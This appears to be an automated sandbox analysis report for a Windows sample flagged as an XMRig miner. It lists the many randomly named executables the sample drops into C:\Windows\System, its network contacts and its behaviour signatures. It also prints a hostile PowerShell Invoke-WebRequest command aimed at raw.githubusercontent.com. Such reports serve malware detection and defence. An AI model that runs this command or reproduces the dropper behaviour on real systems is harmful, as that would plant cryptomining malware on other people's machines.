C:\Windows\System\vHtlNTk.exe

C:\Windows\System\BRzJlGM.exe

C:\Windows\System\BRzJlGM.exe

C:\Windows\System\SMziYeu.exe

C:\Windows\System\SMziYeu.exe

C:\Windows\System\wVuGfih.exe

C:\Windows\System\wVuGfih.exe

C:\Windows\System\LxUmGlo.exe

C:\Windows\System\LxUmGlo.exe

C:\Windows\System\QBrcDcq.exe

C:\Windows\System\QBrcDcq.exe

C:\Windows\System\IlGNoMW.exe

C:\Windows\System\IlGNoMW.exe

C:\Windows\System\zBLNycN.exe

C:\Windows\System\zBLNycN.exe

C:\Windows\System\NzojLoA.exe

C:\Windows\System\NzojLoA.exe

C:\Windows\System\ZzQwKKC.exe

C:\Windows\System\ZzQwKKC.exe

C:\Windows\System\deWpsNz.exe

C:\Windows\System\deWpsNz.exe

C:\Windows\System\fWOOsRX.exe

C:\Windows\System\fWOOsRX.exe

C:\Windows\System\tHnSDAV.exe

C:\Windows\System\tHnSDAV.exe

C:\Windows\System\FOeaoPv.exe

C:\Windows\System\FOeaoPv.exe

C:\Windows\System\OzhDMFP.exe

C:\Windows\System\OzhDMFP.exe

C:\Windows\System\heXzhAC.exe

C:\Windows\System\heXzhAC.exe

C:\Windows\System\cmKXfkn.exe

C:\Windows\System\cmKXfkn.exe

C:\Windows\System\mlZytBR.exe

C:\Windows\System\mlZytBR.exe

C:\Windows\System\ekegPpS.exe

C:\Windows\System\ekegPpS.exe

C:\Windows\System\oKqNzQE.exe

C:\Windows\System\oKqNzQE.exe

C:\Windows\System\sofVOGn.exe

C:\Windows\System\sofVOGn.exe

C:\Windows\System\ElEklWu.exe

C:\Windows\System\ElEklWu.exe

C:\Windows\System\FZwuNrg.exe

C:\Windows\System\FZwuNrg.exe

C:\Windows\System\rqtAjbQ.exe

C:\Windows\System\rqtAjbQ.exe

C:\Windows\System\kTIeevD.exe

C:\Windows\System\kTIeevD.exe

C:\Windows\System\fhgToIT.exe

C:\Windows\System\fhgToIT.exe

C:\Windows\System\pKjAeqY.exe

C:\Windows\System\pKjAeqY.exe

C:\Windows\System\jojLAzS.exe

C:\Windows\System\jojLAzS.exe

C:\Windows\System\TRjTbHj.exe

C:\Windows\System\TRjTbHj.exe

C:\Windows\System\ObcUoim.exe

C:\Windows\System\ObcUoim.exe

C:\Windows\System\BFCeRfj.exe

C:\Windows\System\BFCeRfj.exe

C:\Windows\System\GjBLKmt.exe

C:\Windows\System\GjBLKmt.exe

C:\Windows\System\hPKZrYm.exe

C:\Windows\System\hPKZrYm.exe

C:\Windows\System\DXjSjrl.exe

C:\Windows\System\DXjSjrl.exe

C:\Windows\System\pSShSwo.exe

C:\Windows\System\pSShSwo.exe

C:\Windows\System\tZXHtgh.exe

C:\Windows\System\tZXHtgh.exe

C:\Windows\System\IGDagJq.exe

C:\Windows\System\IGDagJq.exe

C:\Windows\System\EdbDuwN.exe

C:\Windows\System\EdbDuwN.exe

C:\Windows\System\uKdxoXw.exe

C:\Windows\System\uKdxoXw.exe

C:\Windows\System\jamaAmt.exe

C:\Windows\System\jamaAmt.exe

C:\Windows\System\BnOopGF.exe

C:\Windows\System\BnOopGF.exe

C:\Windows\System\kIRtcxV.exe

C:\Windows\System\kIRtcxV.exe

C:\Windows\System\wVumbdJ.exe

C:\Windows\System\wVumbdJ.exe

C:\Windows\System\iGEuqBj.exe

C:\Windows\System\iGEuqBj.exe

C:\Windows\System\dIHlFqB.exe

C:\Windows\System\dIHlFqB.exe

C:\Windows\System\kHoHwxg.exe

C:\Windows\System\kHoHwxg.exe

C:\Windows\System\kDhcYhD.exe

C:\Windows\System\kDhcYhD.exe

C:\Windows\System\QWRLbAL.exe

C:\Windows\System\QWRLbAL.exe

C:\Windows\System\nzDPhRk.exe

C:\Windows\System\nzDPhRk.exe

C:\Windows\System\xXrgYUc.exe

C:\Windows\System\xXrgYUc.exe

C:\Windows\System\pIjWcXL.exe

C:\Windows\System\pIjWcXL.exe

C:\Windows\System\cQkpIrL.exe

C:\Windows\System\cQkpIrL.exe

C:\Windows\System\CNnAeMg.exe

C:\Windows\System\CNnAeMg.exe

C:\Windows\System\KyjoauE.exe

C:\Windows\System\KyjoauE.exe

C:\Windows\System\JHUNbWu.exe

C:\Windows\System\JHUNbWu.exe

C:\Windows\System\SYoQIFe.exe

C:\Windows\System\SYoQIFe.exe

C:\Windows\System\ztHkrbo.exe

C:\Windows\System\ztHkrbo.exe

C:\Windows\System\dWFhKWw.exe

C:\Windows\System\dWFhKWw.exe

C:\Windows\System\XnsqsDU.exe

C:\Windows\System\XnsqsDU.exe

C:\Windows\System\gRjwzXz.exe

C:\Windows\System\gRjwzXz.exe

C:\Windows\System\PbpLAZo.exe

C:\Windows\System\PbpLAZo.exe

C:\Windows\System\gfSnSjO.exe

C:\Windows\System\gfSnSjO.exe

C:\Windows\System\GIhXxWc.exe

C:\Windows\System\GIhXxWc.exe

C:\Windows\System\RiKsAZL.exe

C:\Windows\System\RiKsAZL.exe

C:\Windows\System\SkscEwy.exe

C:\Windows\System\SkscEwy.exe

C:\Windows\System\xuDSorx.exe

C:\Windows\System\xuDSorx.exe

C:\Windows\System\yXNIoTN.exe

C:\Windows\System\yXNIoTN.exe

C:\Windows\System\ndszAoC.exe

C:\Windows\System\ndszAoC.exe

C:\Windows\System\iEiCkmt.exe

C:\Windows\System\iEiCkmt.exe

C:\Windows\System\FdXdDSb.exe

C:\Windows\System\FdXdDSb.exe

C:\Windows\System\dOEmufn.exe

C:\Windows\System\dOEmufn.exe

C:\Windows\System\wtvBQIk.exe

C:\Windows\System\wtvBQIk.exe

C:\Windows\System\macKAbR.exe

C:\Windows\System\macKAbR.exe

C:\Windows\System\XCfOPvp.exe

C:\Windows\System\XCfOPvp.exe

C:\Windows\System\RwoChAQ.exe

C:\Windows\System\RwoChAQ.exe

C:\Windows\System\iUlHahm.exe

C:\Windows\System\iUlHahm.exe

C:\Windows\System\qquDPWk.exe

C:\Windows\System\qquDPWk.exe

C:\Windows\System\lkrGmiA.exe

C:\Windows\System\lkrGmiA.exe

C:\Windows\System\lOvBEEW.exe

C:\Windows\System\lOvBEEW.exe

C:\Windows\System\VnwDqkA.exe

C:\Windows\System\VnwDqkA.exe

C:\Windows\System\NidcIcF.exe

C:\Windows\System\NidcIcF.exe

C:\Windows\System\CvlDhtC.exe

C:\Windows\System\CvlDhtC.exe

C:\Windows\System\TsZsdAW.exe

C:\Windows\System\TsZsdAW.exe

C:\Windows\System\nZEwxvm.exe

C:\Windows\System\nZEwxvm.exe

C:\Windows\System\XidnBDw.exe

C:\Windows\System\XidnBDw.exe

C:\Windows\System\EpNIbHl.exe

C:\Windows\System\EpNIbHl.exe

C:\Windows\System\BSIhKvo.exe

C:\Windows\System\BSIhKvo.exe

C:\Windows\System\hzBrGOY.exe

C:\Windows\System\hzBrGOY.exe

C:\Windows\System\JFIyRkU.exe

C:\Windows\System\JFIyRkU.exe

C:\Windows\System\jSQdMyA.exe

C:\Windows\System\jSQdMyA.exe

C:\Windows\System\AZPtWEf.exe

C:\Windows\System\AZPtWEf.exe

C:\Windows\System\yMMEVnp.exe

C:\Windows\System\yMMEVnp.exe

C:\Windows\System\koYdLHV.exe

C:\Windows\System\koYdLHV.exe

C:\Windows\System\xqEUaiq.exe

C:\Windows\System\xqEUaiq.exe

C:\Windows\System\MsvzlVZ.exe

C:\Windows\System\MsvzlVZ.exe

C:\Windows\System\eAViURA.exe

C:\Windows\System\eAViURA.exe

C:\Windows\System\eiMnVUM.exe

C:\Windows\System\eiMnVUM.exe

C:\Windows\System\elehudR.exe

C:\Windows\System\elehudR.exe

C:\Windows\System\uEbBnMb.exe

C:\Windows\System\uEbBnMb.exe

C:\Windows\System\bRuJJCR.exe

C:\Windows\System\bRuJJCR.exe

C:\Windows\System\tbGJZOV.exe

C:\Windows\System\tbGJZOV.exe

C:\Windows\System\wwkgyOV.exe

C:\Windows\System\wwkgyOV.exe

C:\Windows\System\yYBbacE.exe

C:\Windows\System\yYBbacE.exe

C:\Windows\System\HmNIiHY.exe

C:\Windows\System\HmNIiHY.exe

C:\Windows\System\NdfeuWx.exe

C:\Windows\System\NdfeuWx.exe

C:\Windows\System\cFlWAhK.exe


Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 10:45

Reported

2024-06-12 10:48

Platform

win10v2004-20240508-en

Max time kernel

71s

Max time network

54s

Command Line

"C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


UPX packed file

upx

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\hsTWsvU.exe
PID 1116 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\JWjrjXT.exe
PID 1116 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\JWjrjXT.exe
PID 1116 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\GGNowJC.exe
PID 1116 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\GGNowJC.exe
PID 1116 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\IkFKVgk.exe
PID 1116 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\IkFKVgk.exe
PID 1116 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SeIvyYQ.exe
PID 1116 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SeIvyYQ.exe
PID 1116 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\yGMzmaZ.exe
PID 1116 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\yGMzmaZ.exe
PID 1116 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\DtEpMZX.exe
PID 1116 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\DtEpMZX.exe
PID 1116 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\HzTawYv.exe
PID 1116 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\HzTawYv.exe
PID 1116 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\iyajVLp.exe
PID 1116 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\iyajVLp.exe
PID 1116 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\wVrfVAm.exe
PID 1116 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\wVrfVAm.exe
PID 1116 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\uIGnMmK.exe
PID 1116 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\uIGnMmK.exe
PID 1116 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\GnkVESL.exe
PID 1116 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\GnkVESL.exe
PID 1116 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BsAWsvH.exe
PID 1116 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BsAWsvH.exe
PID 1116 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\fDyJZew.exe
PID 1116 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\fDyJZew.exe
PID 1116 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FJlmAjg.exe
PID 1116 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FJlmAjg.exe
PID 1116 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\EYiVzfP.exe
PID 1116 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\EYiVzfP.exe

Processes

C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\wbWLofe.exe

C:\Windows\System\TvIwfgj.exe

C:\Windows\System\TvIwfgj.exe

C:\Windows\System\tcbkcxA.exe

C:\Windows\System\tcbkcxA.exe

C:\Windows\System\iERWLoD.exe

C:\Windows\System\iERWLoD.exe

C:\Windows\System\wSVRiZF.exe

C:\Windows\System\wSVRiZF.exe

C:\Windows\System\LRaxSIs.exe

C:\Windows\System\LRaxSIs.exe

C:\Windows\System\vxrfwnG.exe

C:\Windows\System\vxrfwnG.exe

C:\Windows\System\eEiQUDz.exe

C:\Windows\System\eEiQUDz.exe

C:\Windows\System\GVXtgEP.exe

C:\Windows\System\GVXtgEP.exe

C:\Windows\System\BYzqmme.exe

C:\Windows\System\BYzqmme.exe

C:\Windows\System\HZoDCDC.exe

C:\Windows\System\HZoDCDC.exe

C:\Windows\System\usTsYOG.exe

C:\Windows\System\usTsYOG.exe

C:\Windows\System\htiTCMM.exe

C:\Windows\System\htiTCMM.exe

C:\Windows\System\CgKXFJw.exe

C:\Windows\System\CgKXFJw.exe

C:\Windows\System\mcjwkAX.exe

C:\Windows\System\mcjwkAX.exe

C:\Windows\System\ROTYpqw.exe

C:\Windows\System\ROTYpqw.exe

C:\Windows\System\SVISqdN.exe

C:\Windows\System\SVISqdN.exe

C:\Windows\System\pDsDUin.exe

C:\Windows\System\pDsDUin.exe

C:\Windows\System\VKJVoHy.exe

C:\Windows\System\VKJVoHy.exe

C:\Windows\System\AXJzxQO.exe

C:\Windows\System\AXJzxQO.exe

C:\Windows\System\YWBArqT.exe

C:\Windows\System\YWBArqT.exe

C:\Windows\System\kzHuGGV.exe

C:\Windows\System\kzHuGGV.exe

C:\Windows\System\XwUAhce.exe

C:\Windows\System\XwUAhce.exe

C:\Windows\System\Vmioaca.exe

C:\Windows\System\Vmioaca.exe

C:\Windows\System\kidkABY.exe

C:\Windows\System\kidkABY.exe

C:\Windows\System\uANnJxU.exe

C:\Windows\System\uANnJxU.exe

C:\Windows\System\tLXCRwU.exe

C:\Windows\System\tLXCRwU.exe

C:\Windows\System\lMrXgdL.exe

C:\Windows\System\lMrXgdL.exe

C:\Windows\System\QBVlcej.exe

C:\Windows\System\QBVlcej.exe

C:\Windows\System\PffQcFx.exe

C:\Windows\System\PffQcFx.exe

C:\Windows\System\HOqWpBg.exe

C:\Windows\System\HOqWpBg.exe

C:\Windows\System\szISCRC.exe

C:\Windows\System\szISCRC.exe

C:\Windows\System\DOxdlQF.exe

C:\Windows\System\DOxdlQF.exe

C:\Windows\System\CEyiZua.exe

C:\Windows\System\CEyiZua.exe

C:\Windows\System\EJgwfnZ.exe

C:\Windows\System\EJgwfnZ.exe

C:\Windows\System\ZwaTuNe.exe

C:\Windows\System\ZwaTuNe.exe

C:\Windows\System\DQVENyn.exe

C:\Windows\System\DQVENyn.exe

C:\Windows\System\iEKciie.exe

C:\Windows\System\iEKciie.exe

C:\Windows\System\mGkuMby.exe

C:\Windows\System\mGkuMby.exe

C:\Windows\System\xmjLXac.exe

C:\Windows\System\xmjLXac.exe

C:\Windows\System\DrtpFwO.exe

C:\Windows\System\DrtpFwO.exe

C:\Windows\System\UFJjbnC.exe

C:\Windows\System\UFJjbnC.exe

C:\Windows\System\ximbrbg.exe

C:\Windows\System\ximbrbg.exe

C:\Windows\System\DrPEmaP.exe

C:\Windows\System\DrPEmaP.exe

C:\Windows\System\sasKIbo.exe

C:\Windows\System\sasKIbo.exe

C:\Windows\System\vPRtxtu.exe

C:\Windows\System\vPRtxtu.exe

C:\Windows\System\ZxbtVFs.exe

C:\Windows\System\ZxbtVFs.exe

C:\Windows\System\FeBPKHq.exe

C:\Windows\System\FeBPKHq.exe

C:\Windows\System\BVFvRwG.exe

C:\Windows\System\BVFvRwG.exe

C:\Windows\System\kCcTwrU.exe

C:\Windows\System\kCcTwrU.exe

C:\Windows\System\skPtUMl.exe

C:\Windows\System\skPtUMl.exe

C:\Windows\System\HDqZumK.exe

C:\Windows\System\HDqZumK.exe

C:\Windows\System\QWsUums.exe

C:\Windows\System\QWsUums.exe

C:\Windows\System\ADNlOTV.exe

C:\Windows\System\ADNlOTV.exe

C:\Windows\System\XQXEJwN.exe

C:\Windows\System\XQXEJwN.exe

C:\Windows\System\xYAjFkk.exe

C:\Windows\System\xYAjFkk.exe

C:\Windows\System\aspNpOR.exe

C:\Windows\System\aspNpOR.exe

C:\Windows\System\ahJFEvC.exe

C:\Windows\System\ahJFEvC.exe

C:\Windows\System\pKNRGID.exe

C:\Windows\System\pKNRGID.exe

C:\Windows\System\hRTWEJA.exe

C:\Windows\System\hRTWEJA.exe

C:\Windows\System\PNhSoQd.exe

C:\Windows\System\PNhSoQd.exe

C:\Windows\System\kMypGbv.exe

C:\Windows\System\kMypGbv.exe

C:\Windows\System\ZGeIUmV.exe

C:\Windows\System\ZGeIUmV.exe

C:\Windows\System\PWDoHyy.exe

C:\Windows\System\PWDoHyy.exe

C:\Windows\System\EEZWZuB.exe

C:\Windows\System\EEZWZuB.exe

C:\Windows\System\mSIVjHX.exe

C:\Windows\System\mSIVjHX.exe

C:\Windows\System\QHCEzFD.exe

C:\Windows\System\QHCEzFD.exe

C:\Windows\System\onTqwru.exe

C:\Windows\System\onTqwru.exe

C:\Windows\System\cKAnbig.exe

C:\Windows\System\cKAnbig.exe

C:\Windows\System\oBcKeGR.exe

C:\Windows\System\oBcKeGR.exe

C:\Windows\System\GQNDDuy.exe

C:\Windows\System\GQNDDuy.exe

C:\Windows\System\NvcGlvh.exe

C:\Windows\System\NvcGlvh.exe

C:\Windows\System\MpMQWHI.exe

C:\Windows\System\MpMQWHI.exe

C:\Windows\System\dQlVdkE.exe

C:\Windows\System\dQlVdkE.exe

C:\Windows\System\byEfwWb.exe

C:\Windows\System\byEfwWb.exe

C:\Windows\System\WYeZGLD.exe

C:\Windows\System\WYeZGLD.exe

C:\Windows\System\jszejCe.exe

C:\Windows\System\jszejCe.exe

C:\Windows\System\VOgfqaa.exe

C:\Windows\System\VOgfqaa.exe

C:\Windows\System\wrmzURQ.exe

C:\Windows\System\wrmzURQ.exe

C:\Windows\System\GhYoffG.exe

C:\Windows\System\GhYoffG.exe

C:\Windows\System\SeZtrOV.exe

C:\Windows\System\SeZtrOV.exe

C:\Windows\System\NMeCWuV.exe

C:\Windows\System\NMeCWuV.exe

C:\Windows\System\jFwZKKf.exe

C:\Windows\System\jFwZKKf.exe

C:\Windows\System\IseVtHJ.exe

C:\Windows\System\IseVtHJ.exe

C:\Windows\System\QXAzpXk.exe

C:\Windows\System\QXAzpXk.exe

C:\Windows\System\qXGcIGc.exe

C:\Windows\System\qXGcIGc.exe

C:\Windows\System\rQIoubR.exe

C:\Windows\System\rQIoubR.exe

C:\Windows\System\BzOYloX.exe

C:\Windows\System\BzOYloX.exe

C:\Windows\System\TwoXEHP.exe

C:\Windows\System\TwoXEHP.exe

C:\Windows\System\oztubMJ.exe

C:\Windows\System\oztubMJ.exe

C:\Windows\System\meOyBVx.exe

C:\Windows\System\meOyBVx.exe

C:\Windows\System\eZxxgGf.exe

C:\Windows\System\eZxxgGf.exe

C:\Windows\System\rHjXKQH.exe

C:\Windows\System\rHjXKQH.exe

C:\Windows\System\jKoJKJN.exe

C:\Windows\System\jKoJKJN.exe

C:\Windows\System\SYvtGTD.exe

C:\Windows\System\SYvtGTD.exe

C:\Windows\System\pOnLQdt.exe

C:\Windows\System\pOnLQdt.exe

C:\Windows\System\JMROVJa.exe

C:\Windows\System\JMROVJa.exe

C:\Windows\System\pxTBlwF.exe

C:\Windows\System\pxTBlwF.exe

C:\Windows\System\XGROiyT.exe

C:\Windows\System\XGROiyT.exe

C:\Windows\System\dZxIOOw.exe

C:\Windows\System\dZxIOOw.exe

C:\Windows\System\osTrsEr.exe

C:\Windows\System\osTrsEr.exe

C:\Windows\System\JxRnuuF.exe

C:\Windows\System\JxRnuuF.exe

C:\Windows\System\BUJOcSx.exe

C:\Windows\System\BUJOcSx.exe

C:\Windows\System\PqrPZlB.exe

C:\Windows\System\PqrPZlB.exe

C:\Windows\System\uvgbAML.exe

C:\Windows\System\uvgbAML.exe

C:\Windows\System\thenwhI.exe

C:\Windows\System\thenwhI.exe

C:\Windows\System\LOCQHbK.exe

C:\Windows\System\LOCQHbK.exe

C:\Windows\System\zjtUxsI.exe

C:\Windows\System\zjtUxsI.exe

C:\Windows\System\xPuziwI.exe

C:\Windows\System\xPuziwI.exe

C:\Windows\System\DZedHST.exe

C:\Windows\System\DZedHST.exe

C:\Windows\System\thjuYbr.exe

C:\Windows\System\thjuYbr.exe

C:\Windows\System\UhODudc.exe

C:\Windows\System\UhODudc.exe

C:\Windows\System\jHvcqTk.exe

C:\Windows\System\jHvcqTk.exe

C:\Windows\System\fpzxduB.exe

C:\Windows\System\fpzxduB.exe

C:\Windows\System\ZFbIipc.exe

C:\Windows\System\ZFbIipc.exe

C:\Windows\System\VpxBGAb.exe

C:\Windows\System\VpxBGAb.exe

C:\Windows\System\lbrQNsR.exe

C:\Windows\System\lbrQNsR.exe

C:\Windows\System\IHpbHcm.exe

C:\Windows\System\IHpbHcm.exe

C:\Windows\System\vzGcjXD.exe

C:\Windows\System\vzGcjXD.exe

C:\Windows\System\EDpyUUM.exe

C:\Windows\System\EDpyUUM.exe

C:\Windows\System\WUTANtR.exe

C:\Windows\System\WUTANtR.exe

C:\Windows\System\UgRYozM.exe

C:\Windows\System\UgRYozM.exe

C:\Windows\System\sVsRoOx.exe

C:\Windows\System\sVsRoOx.exe

C:\Windows\System\yRETVNw.exe

C:\Windows\System\yRETVNw.exe

C:\Windows\System\cklKqho.exe

C:\Windows\System\cklKqho.exe

C:\Windows\System\keWudfQ.exe

C:\Windows\System\keWudfQ.exe

C:\Windows\System\NVrdgaq.exe

C:\Windows\System\NVrdgaq.exe

C:\Windows\System\CmBaYfe.exe

C:\Windows\System\CmBaYfe.exe

C:\Windows\System\AnpcItf.exe

C:\Windows\System\AnpcItf.exe

C:\Windows\System\bhLyIlM.exe

C:\Windows\System\bhLyIlM.exe

C:\Windows\System\SqhhOaF.exe

C:\Windows\System\SqhhOaF.exe

C:\Windows\System\idbdsDm.exe

C:\Windows\System\idbdsDm.exe

C:\Windows\System\bCGCENt.exe

C:\Windows\System\bCGCENt.exe

C:\Windows\System\OTrzmfx.exe

C:\Windows\System\OTrzmfx.exe

C:\Windows\System\eGcSNKN.exe

C:\Windows\System\eGcSNKN.exe

C:\Windows\System\DNJAbBp.exe

C:\Windows\System\DNJAbBp.exe

C:\Windows\System\kIySOGY.exe

C:\Windows\System\kIySOGY.exe

C:\Windows\System\rkuuBrH.exe

C:\Windows\System\rkuuBrH.exe

C:\Windows\System\pDToyLi.exe

C:\Windows\System\pDToyLi.exe

C:\Windows\System\CbfNPRc.exe

C:\Windows\System\CbfNPRc.exe

C:\Windows\System\LsfCYKN.exe

C:\Windows\System\LsfCYKN.exe

C:\Windows\System\NPAuhcf.exe

C:\Windows\System\NPAuhcf.exe

C:\Windows\System\PTLunlp.exe

C:\Windows\System\PTLunlp.exe

C:\Windows\System\yMVNOLN.exe

C:\Windows\System\yMVNOLN.exe

C:\Windows\System\WNrUjbe.exe

C:\Windows\System\WNrUjbe.exe

C:\Windows\System\binOLUF.exe

C:\Windows\System\binOLUF.exe

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2892" "2508" "2460" "2512" "0" "0" "2516" "0" "0" "0" "0" "0"


Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp

Files
